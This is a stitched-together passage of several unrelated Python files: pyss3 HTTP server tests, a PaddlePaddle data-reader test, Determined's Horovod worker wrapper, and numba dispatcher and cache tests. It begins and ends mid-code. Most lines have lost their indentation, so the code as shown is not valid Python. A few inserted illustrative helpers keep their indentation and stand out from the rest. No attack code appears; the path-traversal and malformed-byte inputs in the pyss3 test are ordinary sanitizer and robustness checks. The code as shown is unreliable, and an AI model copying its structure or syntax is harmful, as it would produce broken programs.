"""Stop various threads and connections."""
self._exiting = True
self._events.put(None)
self._events_thread.join()
if self._args.local:
self._websocket_connection.close()
self._websocket_thread.join()
else:
self._pusher.disconnect()
|
test_server.py
|
# -*- coding: utf-8 -*-
"""Tests for pyss3.server."""
import pyss3.server as s
import threading
import argparse
import socket
import pytest
import pyss3
import json
import sys
from os import path
from pyss3 import SS3
from pyss3.util import Dataset, Print
HTTP_REQUEST = "%s %s HTTP/1.1\r\nContent-Length: %d\r\n\r\n%s"
RECV_BUFFER = 1024 * 1024 # 1MB
PYTHON3 = sys.version_info[0] >= 3
DATASET_FOLDER = "dataset"
DATASET_FOLDER_MR = "dataset_mr"
ADDRESS, PORT = "localhost", None
LT = s.Live_Test
dataset_path = path.join(path.abspath(path.dirname(__file__)), DATASET_FOLDER)
dataset_path_mr = path.join(path.abspath(path.dirname(__file__)), DATASET_FOLDER_MR)
x_train, y_train = None, None
clf = None
pyss3.set_verbosity(0)
x_train, y_train = Dataset.load_from_files(dataset_path_mr)
x_train, y_train = Dataset.load_from_files(dataset_path, folder_label=False)
clf = SS3()
clf.fit(x_train, y_train)
LT.serve() # no model error
LT.set_model(clf)
LT.get_port()
class MockCmdLineArgs:
"""Mocked command-line arguments."""
quiet = True
MODEL = "name"
path = dataset_path
label = 'folder'
port = 0
@pytest.fixture()
def mockers(mocker):
"""Set mockers up."""
mocker.patch.object(LT, "serve")
mocker.patch.object(SS3, "load_model")
mocker.patch.object(argparse.ArgumentParser, "add_argument")
mocker.patch.object(argparse.ArgumentParser,
"parse_args").return_value = MockCmdLineArgs
@pytest.fixture(params=[0, 1, 2, 3])
def test_case(request, mocker):
"""Argument values generator for test_live_test(test_case)."""
mocker.patch("webbrowser.open")
if request.param == 0:
LT.set_testset_from_files(dataset_path, folder_label=False)
elif request.param == 1:
LT.set_testset_from_files(dataset_path_mr, folder_label=True)
elif request.param == 2:
LT.set_testset(x_train, y_train)
else:
LT.__server_socket__ = None
yield request.param
def http_request(path, body='', get=False, as_bytes=False):
"""Create a basic HTTP request message."""
request = HTTP_REQUEST % ("GET" if get else "POST", path, len(body), body)
return request.encode() if as_bytes else request
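# Illustrative example (not part of the original tests): with the HTTP_REQUEST
# template above, http_request() produces a minimal raw HTTP/1.1 message of the
# kind the Live Test Server's parser expects, e.g.:
def _example_raw_request():
    """Illustration only: show the exact message produced for a small POST."""
    msg = http_request("/ack", "hi")
    assert msg == "POST /ack HTTP/1.1\r\nContent-Length: 2\r\n\r\nhi"
    return msg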
def http_response_body(sock):
"""Return all HTTP message body."""
data = sock.recv(RECV_BUFFER).decode()
length = s.get_http_contlength(data)
body = s.get_http_body(data)
while len(body) < length and data:
data = sock.recv(RECV_BUFFER).decode()
body += data
return body # url_decode(body)
def send_http_request(path, body='', get=False, json_rsp=True):
"""Send an HTTP request to the Live Test Server."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ADDRESS, PORT))
sock.sendall(http_request(path, body, get, as_bytes=True))
r = http_response_body(sock)
sock.close()
return json.loads(r) if json_rsp and r else r
def test_http_helper_functions():
"""Test for pyss3.server HTTP helper function."""
assert s.content_type("js") == "application/javascript"
assert s.content_type("non-existing") == "application/octet-stream"
request_path = "/the/path"
request_body = "the body"
assert s.parse_and_sanitize("../../a/path/../../")[0][-17:] == "a/path/index.html"
assert s.parse_and_sanitize("/")[0][-10:] == "index.html"
assert s.get_http_path(http_request(request_path)) == request_path
assert s.get_http_body(http_request("", request_body)) == request_body
assert s.get_http_contlength(http_request("", request_body)) == len(request_body)
def test_live_test(test_case):
"""Test the HTTP Live Test Server."""
global PORT
if test_case != 3:
PORT = LT.start_listening()
else:
Print.error = lambda _: None # do nothing
serve_args = {
"x_test": x_train if test_case == 2 or test_case == 3 else None,
"y_test": y_train if test_case == 2 else None,
"quiet": test_case != 0
}
if PYTHON3:
threading.Thread(target=LT.serve, kwargs=serve_args, daemon=True).start()
else:
return
# threading.Thread(target=LT.serve, kwargs=serve_args).start()
if test_case == 3:
return
# empty message
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ADDRESS, PORT))
sock.sendall(b'')
sock.close()
# decode error
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ADDRESS, PORT))
sock.sendall(b'\x01\x0E\xFF\xF0\x02\x0F\xE1')
sock.close()
# 404 error
send_http_request("/404")
# ack
send_http_request("/ack")
# get_info
r = send_http_request("/get_info")
assert r["model_name"] == clf.get_name()
cats = r["categories"]
docs = r["docs"]
assert len(cats) == 8 + 1
# assert len(docs) == len(cats) - 1
# assert len(docs[cats[0]]["path"]) == 100
# classify
r = send_http_request(
"/classify",
"this is an android mobile " * (1024 * 4 if test_case == 0 else 1)
)
assert r["ci"][r["cvns"][0][0]] == "science&technology"
# get_doc
for c in docs:
r = send_http_request("/get_doc", docs[c]["path"][1])
assert len(r["content"][:2]) == 2
# GET 404
send_http_request("/404", get=True, json_rsp=False)
# GET index.html
r = send_http_request("/", get=True, json_rsp=False)
assert "<html>" in r
def test_main(mockers):
"""Test the main() function."""
if not PYTHON3:
return
s.main()
|
test_py_reader_using_executor.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import paddle.fluid as fluid
import paddle.fluid.core as core
import numpy as np
import threading
import multiprocessing
import os
def as_tensor(np_array_or_tensor, place=None):
if isinstance(np_array_or_tensor, fluid.LoDTensor):
return np_array_or_tensor
if place is None:
place = fluid.CPUPlace()
tensor = fluid.LoDTensor()
tensor.set(np_array_or_tensor, place)
return tensor
def as_numpy(tensor_or_numpy):
return tensor_or_numpy if isinstance(
tensor_or_numpy, np.ndarray) else np.array(tensor_or_numpy)
def feed_data(feed_queue, reader):
data_generator = reader()
while True:
data = next(data_generator, None)
if data is None or not feed_queue.push(data):
break
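# Illustrative note (not part of the original test): feed_data() relies on the
# next(generator, default) idiom, which returns the default instead of raising
# StopIteration once the generator is exhausted. A minimal standalone example:
def _example_next_with_default():
    gen = (i for i in range(2))
    assert next(gen, None) == 0
    assert next(gen, None) == 1
    assert next(gen, None) is None  # exhausted: the default is returned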
def simple_fc_net(in_size,
class_num,
hidden_sizes,
batch_size,
queue_capacity,
use_double_buffer=False,
use_feed_list=True):
if use_feed_list:
data = fluid.layers.data(name="data", dtype='float32', shape=[in_size])
label = fluid.layers.data(name='label', dtype='int64', shape=[1])
py_reader = fluid.layers.create_py_reader_by_data(
capacity=queue_capacity,
use_double_buffer=False,
feed_list=[data, label])
else:
py_reader = fluid.layers.py_reader(
capacity=queue_capacity,
shapes=[[-1, in_size], [-1, 1]],
lod_levels=[0, 0],
dtypes=['float32', 'int64'],
use_double_buffer=False)
feed_queue = py_reader.queue
reader = fluid.layers.batch(py_reader, batch_size=batch_size)
if use_double_buffer:
reader = fluid.layers.double_buffer(reader)
in_data, label = fluid.layers.read_file(reader)
hidden = in_data
for hidden_size in hidden_sizes:
hidden = fluid.layers.fc(
hidden,
size=hidden_size,
act='tanh',
bias_attr=fluid.ParamAttr(
initializer=fluid.initializer.Constant(value=1.0)))
predict_label = fluid.layers.fc(hidden, size=class_num, act='softmax')
loss = fluid.layers.mean(
fluid.layers.cross_entropy(
input=predict_label, label=label))
optimizer = fluid.optimizer.Adam()
optimizer.minimize(loss)
return in_data, label, loss, optimizer, feed_queue, py_reader
class TestPyReaderUsingExecutor(unittest.TestCase):
def setUp(self):
self.in_size = 1000
self.hidden_sizes = [50, 30, 20]
self.class_num = 10
self.batch_size = 32
self.iterations = 10
self.queue_capacity = 50
def test(self):
for use_cuda in ([False, True]
if core.is_compiled_with_cuda() else [False]):
for use_parallel_executor in [False, True]:
for use_double_buffer in [False, True]:
for use_feed_list in [False, True]:
for use_decorate_paddle_reader in [False, True]:
print('Test Parameters:'),
print({
'use_cuda': use_cuda,
'use_parallel_executor': use_parallel_executor,
'use_double_buffer': use_double_buffer,
'use_feed_list': use_feed_list,
'use_decorate_paddle_reader':
use_decorate_paddle_reader
})
self.main(use_cuda, use_parallel_executor,
use_double_buffer, use_feed_list,
use_decorate_paddle_reader)
def tensor_reader(self, use_decorate_paddle_reader):
def reader():
self.inputs = []
cnt = 0
while True:
tensors = fluid.LoDTensorArray()
in_data = np.random.uniform(
low=0, high=1, size=(1, self.in_size)).astype('float32')
tensors.append(as_tensor(in_data))
label = np.random.random_integers(
low=0, high=self.class_num - 1, size=(1, 1)).astype('int64')
tensors.append(as_tensor(label))
if cnt < self.iterations * self.batch_size * self.batch_size_times:
if cnt % (self.batch_size * self.batch_size_times) == 0:
self.inputs.append([in_data, label])
else:
self.inputs[-1][0] = np.concatenate(
(self.inputs[-1][0], in_data), axis=0)
self.inputs[-1][1] = np.concatenate(
(self.inputs[-1][1], label), axis=0)
elif not self.use_double_buffer:
break
if use_decorate_paddle_reader:
yield [(in_data, label)]
else:
yield tensors
cnt += 1
if not use_decorate_paddle_reader:
yield None
return reader
def main(self,
use_cuda=True,
use_parallel_executor=False,
use_double_buffer=False,
use_feed_list=False,
use_decorate_paddle_reader=False):
assert not use_cuda or use_cuda and core.is_compiled_with_cuda()
self.use_cuda = use_cuda
self.use_parallel_executor = use_parallel_executor
self.use_double_buffer = use_double_buffer
self.use_feed_list = use_feed_list
self.use_decorate_paddle_reader = use_decorate_paddle_reader
startup_program = fluid.Program()
main_program = fluid.Program()
with fluid.program_guard(main_program, startup_program):
in_data, label, loss, optimizer, feed_queue, py_reader = simple_fc_net(
in_size=self.in_size,
class_num=self.class_num,
hidden_sizes=self.hidden_sizes,
batch_size=self.batch_size,
queue_capacity=self.queue_capacity,
use_double_buffer=self.use_double_buffer,
use_feed_list=self.use_feed_list)
place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()
startup_exe = fluid.Executor(place)
startup_exe.run(startup_program)
if use_parallel_executor:
main_exe = fluid.ParallelExecutor(use_cuda, loss_name=loss.name)
if use_cuda:
self.batch_size_times = core.get_cuda_device_count()
else:
self.batch_size_times = int(
os.environ.get('CPU_NUM', multiprocessing.cpu_count()))
else:
main_exe = startup_exe
self.batch_size_times = 1
reader = self.tensor_reader(use_decorate_paddle_reader)
if use_decorate_paddle_reader:
py_reader.decorate_paddle_reader(reader)
py_reader.start()
else:
thread = threading.Thread(
target=feed_data, args=(feed_queue, reader))
thread.daemon = True
thread.start()
self.outputs = []
for _ in range(self.iterations):
fetches = main_exe.run(fetch_list=[in_data.name, label.name])
fetches = [as_numpy(fetch) for fetch in fetches]
self.outputs.append(fetches)
feed_queue.close()
self.validate()
if use_decorate_paddle_reader:
py_reader.exited = True
py_reader.thread.join()
else:
thread.join()
def validate(self):
self.assertEqual(len(self.inputs), len(self.outputs))
for batch_in, batch_out in zip(self.inputs, self.outputs):
self.assertEqual(len(batch_in), len(batch_out))
if self.use_parallel_executor and not self.use_double_buffer:
self.validate_unordered_batch(batch_in, batch_out)
else:
for in_data, out_data in zip(batch_in, batch_out):
self.assertEqual(in_data.shape, out_data.shape)
if not self.use_parallel_executor:
self.assertTrue((in_data == out_data).all())
def validate_unordered_batch(self, batch_in, batch_out):
out_index_left_set = set(range(self.batch_size * self.batch_size_times))
mapping_num = 0
for i in range(self.batch_size * self.batch_size_times):
for j in out_index_left_set:
flag = True
for k in range(len(batch_in)):
in_data = batch_in[k][i]
out_data = batch_out[k][j]
if (in_data != out_data).any():
flag = False
break
if flag:
out_index_left_set.remove(j)
mapping_num += 1
break
self.assertEqual(mapping_num, self.batch_size * self.batch_size_times)
if __name__ == '__main__':
unittest.main()
|
worker_process_wrapper.py
|
"""
worker_process_wrapper.py is the entrypoint for Horovod worker processes.
It exists to redirect stdout/stderr to the Docker logs without needing
to package a shell script.
"""
import os
import subprocess
import sys
import threading
from typing import BinaryIO, List
from determined import constants
def forward_stream(src_stream: BinaryIO, dst_stream: BinaryIO, rank: str) -> None:
for line in iter(src_stream.readline, b""):
line = f"[rank={rank}] ".encode() + line
os.write(dst_stream.fileno(), line)
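# Illustrative note (not part of the original module): iter(callable, sentinel)
# keeps calling the callable until it returns the sentinel, which is how
# forward_stream() reads a pipe line-by-line until EOF (readline() -> b"").
# A minimal standalone example:
def _example_iter_sentinel() -> None:
    import io
    stream = io.BytesIO(b"a\nb\n")
    assert list(iter(stream.readline, b"")) == [b"a\n", b"b\n"]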
def run_all(ts: List[threading.Thread]) -> None:
for t in ts:
t.start()
for t in ts:
t.join()
def main() -> int:
rank = os.environ.get("HOROVOD_RANK")
proc = subprocess.Popen(sys.argv[1:], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
with open(constants.CONTAINER_STDOUT, "w") as cstdout, open(
constants.CONTAINER_STDERR, "w"
) as cstderr, proc:
run_all(
[
threading.Thread(target=forward_stream, args=(proc.stdout, cstdout, rank)),
threading.Thread(target=forward_stream, args=(proc.stderr, cstderr, rank)),
]
)
return proc.returncode
if __name__ == "__main__":
sys.exit(main())
|
test_dispatcher.py
|
from __future__ import print_function, division, absolute_import
import errno
import multiprocessing
import os
import shutil
import subprocess
import sys
import threading
import warnings
import numpy as np
from numba import unittest_support as unittest
from numba import utils, jit, generated_jit, types, typeof
from numba import _dispatcher
from numba.errors import NumbaWarning
from .support import TestCase, tag, temp_directory, import_dynamic
def dummy(x):
return x
def add(x, y):
return x + y
def addsub(x, y, z):
return x - y + z
def addsub_defaults(x, y=2, z=3):
return x - y + z
def star_defaults(x, y=2, *z):
return x, y, z
def generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x, y):
return x + y
else:
def impl(x, y):
return x - y
return impl
def bad_generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x):
return x
else:
def impl(x, y=6):
return x - y
return impl
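# Illustrative sketch (not part of the original tests): generated_usecase above
# is meant to be consumed through numba's generated_jit, which calls it at
# compile time with the argument *types* and compiles whichever implementation
# it returns. Assuming numba is installed:
def _example_generated_dispatch():
    f = generated_jit(nopython=True)(generated_usecase)
    assert f(8) == 3          # x is not Complex -> impl computes x - y
    assert f(1j) == 5 + 1j    # x is Complex     -> impl computes x + y
    return f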
class BaseTest(TestCase):
jit_args = dict(nopython=True)
def compile_func(self, pyfunc):
def check(*args, **kwargs):
expected = pyfunc(*args, **kwargs)
result = f(*args, **kwargs)
self.assertPreciseEqual(result, expected)
f = jit(**self.jit_args)(pyfunc)
return f, check
class TestDispatcher(BaseTest):
def test_dyn_pyfunc(self):
@jit
def foo(x):
return x
foo(1)
[cr] = foo.overloads.values()
# __module__ must match that of foo
self.assertEqual(cr.entry_point.__module__, foo.py_func.__module__)
def test_no_argument(self):
@jit
def foo():
return 1
# Just make sure this doesn't crash
foo()
def test_coerce_input_types(self):
# Issue #486: do not allow unsafe conversions if we can still
# compile other specializations.
c_add = jit(nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
self.assertPreciseEqual(c_add(12.3, 45.6), add(12.3, 45.6))
self.assertPreciseEqual(c_add(12.3, 45.6j), add(12.3, 45.6j))
self.assertPreciseEqual(c_add(12300000000, 456), add(12300000000, 456))
# Now force compilation of only a single specialization
c_add = jit('(i4, i4)', nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
# Implicit (unsafe) conversion of float to int
self.assertPreciseEqual(c_add(12.3, 45.6), add(12, 45))
with self.assertRaises(TypeError):
# Implicit conversion of complex to int disallowed
c_add(12.3, 45.6j)
def test_ambiguous_new_version(self):
"""Test compiling new version in an ambiguous case
"""
@jit
def foo(a, b):
return a + b
INT = 1
FLT = 1.5
self.assertAlmostEqual(foo(INT, FLT), INT + FLT)
self.assertEqual(len(foo.overloads), 1)
self.assertAlmostEqual(foo(FLT, INT), FLT + INT)
self.assertEqual(len(foo.overloads), 2)
self.assertAlmostEqual(foo(FLT, FLT), FLT + FLT)
self.assertEqual(len(foo.overloads), 3)
# The following call is ambiguous because (int, int) can resolve
# to (float, int) or (int, float) with equal weight.
self.assertAlmostEqual(foo(1, 1), INT + INT)
self.assertEqual(len(foo.overloads), 4, "didn't compile a new "
"version")
def test_lock(self):
"""
Test that (lazy) compiling from several threads at once doesn't
produce errors (see issue #908).
"""
errors = []
@jit
def foo(x):
return x + 1
def wrapper():
try:
self.assertEqual(foo(1), 2)
except BaseException as e:
errors.append(e)
threads = [threading.Thread(target=wrapper) for i in range(16)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertFalse(errors)
def test_explicit_signatures(self):
f = jit("(int64,int64)")(add)
# Approximate match (unsafe conversion)
self.assertPreciseEqual(f(1.5, 2.5), 3)
self.assertEqual(len(f.overloads), 1, f.overloads)
f = jit(["(int64,int64)", "(float64,float64)"])(add)
# Exact signature matches
self.assertPreciseEqual(f(1, 2), 3)
self.assertPreciseEqual(f(1.5, 2.5), 4.0)
# Approximate match (int32 -> float64 is a safe conversion)
self.assertPreciseEqual(f(np.int32(1), 2.5), 3.5)
# No conversion
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertIn("No matching definition", str(cm.exception))
self.assertEqual(len(f.overloads), 2, f.overloads)
# A more interesting one...
f = jit(["(float32,float32)", "(float64,float64)"])(add)
self.assertPreciseEqual(f(np.float32(1), np.float32(2**-25)), 1.0)
self.assertPreciseEqual(f(1, 2**-25), 1.0000000298023224)
# Fail to resolve ambiguity between the two best overloads
f = jit(["(float32,float64)",
"(float64,float32)",
"(int64,int64)"])(add)
with self.assertRaises(TypeError) as cm:
f(1.0, 2.0)
# The two best matches are output in the error message, as well
# as the actual argument types.
self.assertRegexpMatches(
str(cm.exception),
r"Ambiguous overloading for <function add [^>]*> \(float64, float64\):\n"
r"\(float32, float64\) -> float64\n"
r"\(float64, float32\) -> float64"
)
# The integer signature is not part of the best matches
self.assertNotIn("int64", str(cm.exception))
def test_signature_mismatch(self):
tmpl = "Signature mismatch: %d argument types given, but function takes 2 arguments"
with self.assertRaises(TypeError) as cm:
jit("()")(add)
self.assertIn(tmpl % 0, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,)")(add)
self.assertIn(tmpl % 1, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,intc,intc)")(add)
self.assertIn(tmpl % 3, str(cm.exception))
# With forceobj=True, an empty tuple is accepted
jit("()", forceobj=True)(add)
with self.assertRaises(TypeError) as cm:
jit("(intc,)", forceobj=True)(add)
self.assertIn(tmpl % 1, str(cm.exception))
def test_matching_error_message(self):
f = jit("(intc,intc)")(add)
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertEqual(str(cm.exception),
"No matching definition for argument type(s) "
"complex128, complex128")
def test_disabled_compilation(self):
@jit
def foo(a):
return a
foo.compile("(float32,)")
foo.disable_compile()
with self.assertRaises(RuntimeError) as raises:
foo.compile("(int32,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 1)
def test_disabled_compilation_through_list(self):
@jit(["(float32,)", "(int32,)"])
def foo(a):
return a
with self.assertRaises(RuntimeError) as raises:
foo.compile("(complex64,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 2)
def test_disabled_compilation_nested_call(self):
@jit(["(intp,)"])
def foo(a):
return a
@jit
def bar():
foo(1)
foo(np.ones(1)) # no matching definition
with self.assertRaises(TypeError) as raises:
bar()
m = "No matching definition for argument type(s) array(float64, 1d, C)"
self.assertEqual(str(raises.exception), m)
def test_fingerprint_failure(self):
"""
Failure in computing the fingerprint cannot affect a nopython=False
function. On the other hand, with nopython=True, a ValueError should
be raised to report the fingerprint failure.
"""
@jit
def foo(x):
return x
# Empty list will trigger failure in compile_fingerprint
errmsg = 'cannot compute fingerprint of empty list'
with self.assertRaises(ValueError) as raises:
_dispatcher.compute_fingerprint([])
self.assertIn(errmsg, str(raises.exception))
# It should work in fallback
self.assertEqual(foo([]), [])
# But, not in nopython=True
strict_foo = jit(nopython=True)(foo.py_func)
with self.assertRaises(ValueError) as raises:
strict_foo([])
self.assertIn(errmsg, str(raises.exception))
# Test in loop lifting context
@jit
def bar():
object() # force looplifting
x = []
for i in range(10):
x = foo(x)
return x
self.assertEqual(bar(), [])
# Make sure it was looplifted
[cr] = bar.overloads.values()
self.assertEqual(len(cr.lifted), 1)
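# Illustrative sketch (not part of the original tests): the dispatcher behaviour
# exercised above amounts to lazy specialization, i.e. one compiled overload per
# distinct argument-type signature. Assuming numba is installed:
def _example_lazy_specialization():
    @jit(nopython=True)
    def add1(x):
        return x + 1
    add1(1)      # triggers an integer specialization
    add1(1.5)    # triggers a float specialization
    assert len(add1.signatures) == 2
    return add1.signatures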
class TestSignatureHandling(BaseTest):
"""
Test support for various parameter passing styles.
"""
@tag('important')
def test_named_args(self):
"""
Test passing named arguments to a dispatcher.
"""
f, check = self.compile_func(addsub)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# All calls above fall under the same specialization
self.assertEqual(len(f.overloads), 1)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected 3, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6)
self.assertIn("missing argument 'z'", str(cm.exception))
def test_default_args(self):
"""
Test omitting arguments with a default value.
"""
f, check = self.compile_func(addsub_defaults)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# Now omitting some values
check(3, z=10)
check(3, 4)
check(x=3, y=4)
check(3)
check(x=3)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected at least 1, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(y=6, z=7)
self.assertIn("missing argument 'x'", str(cm.exception))
def test_star_args(self):
"""
Test a compiled function with starargs in the signature.
"""
f, check = self.compile_func(star_defaults)
check(4)
check(4, 5)
check(4, 5, 6)
check(4, 5, 6, 7)
check(4, 5, 6, 7, 8)
check(x=4)
check(x=4, y=5)
check(4, y=5)
with self.assertRaises(TypeError) as cm:
f(4, 5, y=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, 5, z=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, x=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
class TestSignatureHandlingObjectMode(TestSignatureHandling):
"""
Same as TestSignatureHandling, but in object mode.
"""
jit_args = dict(forceobj=True)
class TestGeneratedDispatcher(TestCase):
"""
Tests for @generated_jit.
"""
@tag('important')
def test_generated(self):
f = generated_jit(nopython=True)(generated_usecase)
self.assertEqual(f(8), 8 - 5)
self.assertEqual(f(x=8), 8 - 5)
self.assertEqual(f(x=8, y=4), 8 - 4)
self.assertEqual(f(1j), 5 + 1j)
self.assertEqual(f(1j, 42), 42 + 1j)
self.assertEqual(f(x=1j, y=7), 7 + 1j)
def test_signature_errors(self):
"""
Check error reporting when implementation signature doesn't match
generating function signature.
"""
f = generated_jit(nopython=True)(bad_generated_usecase)
# Mismatching # of arguments
with self.assertRaises(TypeError) as raises:
f(1j)
self.assertIn("should be compatible with signature '(x, y=5)', but has signature '(x)'",
str(raises.exception))
# Mismatching defaults
with self.assertRaises(TypeError) as raises:
f(1)
self.assertIn("should be compatible with signature '(x, y=5)', but has signature '(x, y=6)'",
str(raises.exception))
class TestDispatcherMethods(TestCase):
def test_recompile(self):
closure = 1
@jit
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2.5)
self.assertEqual(len(foo.signatures), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
# Everything was recompiled
self.assertEqual(len(foo.signatures), 2)
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3.5)
def test_recompile_signatures(self):
# Same as above, but with an explicit signature on @jit.
closure = 1
@jit("int32(int32)")
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3)
@tag('important')
def test_inspect_llvm(self):
# Create a jitted function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all llvm in a dict
llvms = foo.inspect_llvm()
self.assertEqual(len(llvms), 3)
# make sure the function name shows up in the llvm
for llvm_bc in llvms.values():
# Look for the function name
self.assertIn("foo", llvm_bc)
# Look for the argument names
self.assertIn("explicit_arg1", llvm_bc)
self.assertIn("explicit_arg2", llvm_bc)
def test_inspect_asm(self):
# Create a jitted function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all asm in a dict
asms = foo.inspect_asm()
self.assertEqual(len(asms), 3)
# make sure the function name shows up in the asm
for asm in asms.values():
# Look for the function name
self.assertTrue("foo" in asm)
def test_inspect_cfg(self):
# Exercise the .inspect_cfg(). These are minimal tests and do not
# fully check the correctness of the function.
@jit
def foo(the_array):
return the_array.sum()
# Generate 3 overloads
a1 = np.ones(1)
a2 = np.ones((1, 1))
a3 = np.ones((1, 1, 1))
foo(a1)
foo(a2)
foo(a3)
# Call inspect_cfg() without arguments
cfgs = foo.inspect_cfg()
# Correct count of overloads
self.assertEqual(len(cfgs), 3)
# Makes sure all the signatures are correct
[s1, s2, s3] = cfgs.keys()
self.assertEqual(set([s1, s2, s3]),
set(map(lambda x: (typeof(x),), [a1, a2, a3])))
def check_display(cfg, wrapper=''):
# simple stringify test
if wrapper:
wrapper = "{}{}".format(len(wrapper), wrapper)
prefix = r'^digraph "CFG for \'_ZN{}5numba'.format(wrapper)
self.assertRegexpMatches(str(cfg), prefix)
# .display() requires an optional dependency on `graphviz`.
# just test for the attribute without running it.
self.assertTrue(callable(cfg.display))
for cfg in cfgs.values():
check_display(cfg)
self.assertEqual(len(list(cfgs.values())), 3)
# Call inspect_cfg(signature)
cfg = foo.inspect_cfg(signature=foo.signatures[0])
check_display(cfg)
# Call inspect_cfg(signature, show_wrapper="python")
cfg = foo.inspect_cfg(signature=foo.signatures[0],
show_wrapper="python")
check_display(cfg, wrapper='cpython')
def test_inspect_types(self):
@jit
def foo(a, b):
return a + b
foo(1, 2)
# Exercise the method
foo.inspect_types(utils.StringIO())
def test_issue_with_array_layout_conflict(self):
"""
This tests an issue with the dispatcher when an array that is both
C and F contiguous is supplied as the first signature.
The dispatcher checks for F contiguity first but the compiler checks
for C contiguity first. This results in C contiguous code being inserted
as the F contiguous function.
"""
def pyfunc(A, i, j):
return A[i, j]
cfunc = jit(pyfunc)
ary_c_and_f = np.array([[1.]])
ary_c = np.array([[0., 1.], [2., 3.]], order='C')
ary_f = np.array([[0., 1.], [2., 3.]], order='F')
exp_c = pyfunc(ary_c, 1, 0)
exp_f = pyfunc(ary_f, 1, 0)
self.assertEqual(1., cfunc(ary_c_and_f, 0, 0))
got_c = cfunc(ary_c, 1, 0)
got_f = cfunc(ary_f, 1, 0)
self.assertEqual(exp_c, got_c)
self.assertEqual(exp_f, got_f)
class BaseCacheTest(TestCase):
# This class is also used in test_cfunc.py.
# The source file that will be copied
usecases_file = None
# Make sure this doesn't conflict with another module
modname = None
def setUp(self):
self.tempdir = temp_directory('test_cache')
sys.path.insert(0, self.tempdir)
self.modfile = os.path.join(self.tempdir, self.modname + ".py")
self.cache_dir = os.path.join(self.tempdir, "__pycache__")
shutil.copy(self.usecases_file, self.modfile)
self.maxDiff = None
def tearDown(self):
sys.modules.pop(self.modname, None)
sys.path.remove(self.tempdir)
def import_module(self):
# Import a fresh version of the test module. All jitted functions
# in the test module will start anew and load overloads from
# the on-disk cache if possible.
old = sys.modules.pop(self.modname, None)
if old is not None:
# Make sure cached bytecode is removed
if sys.version_info >= (3,):
cached = [old.__cached__]
else:
if old.__file__.endswith(('.pyc', '.pyo')):
cached = [old.__file__]
else:
cached = [old.__file__ + 'c', old.__file__ + 'o']
for fn in cached:
try:
os.unlink(fn)
except OSError as e:
if e.errno != errno.ENOENT:
raise
mod = import_dynamic(self.modname)
self.assertEqual(mod.__file__.rstrip('co'), self.modfile)
return mod
def cache_contents(self):
try:
return [fn for fn in os.listdir(self.cache_dir)
if not fn.endswith(('.pyc', ".pyo"))]
except OSError as e:
if e.errno != errno.ENOENT:
raise
return []
def get_cache_mtimes(self):
return dict((fn, os.path.getmtime(os.path.join(self.cache_dir, fn)))
for fn in sorted(self.cache_contents()))
def check_pycache(self, n):
c = self.cache_contents()
self.assertEqual(len(c), n, c)
def dummy_test(self):
pass
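# Illustrative sketch (not part of the original tests): the on-disk caching that
# TestCache exercises is enabled per-function with jit(cache=True); the compiled
# overloads are then written alongside the defining module (by default under its
# __pycache__ directory) and reloaded on the next import. Assuming numba is
# installed, a minimal cached function looks like:
def _example_cached_function():
    @jit(cache=True, nopython=True)
    def cached_add(x, y):
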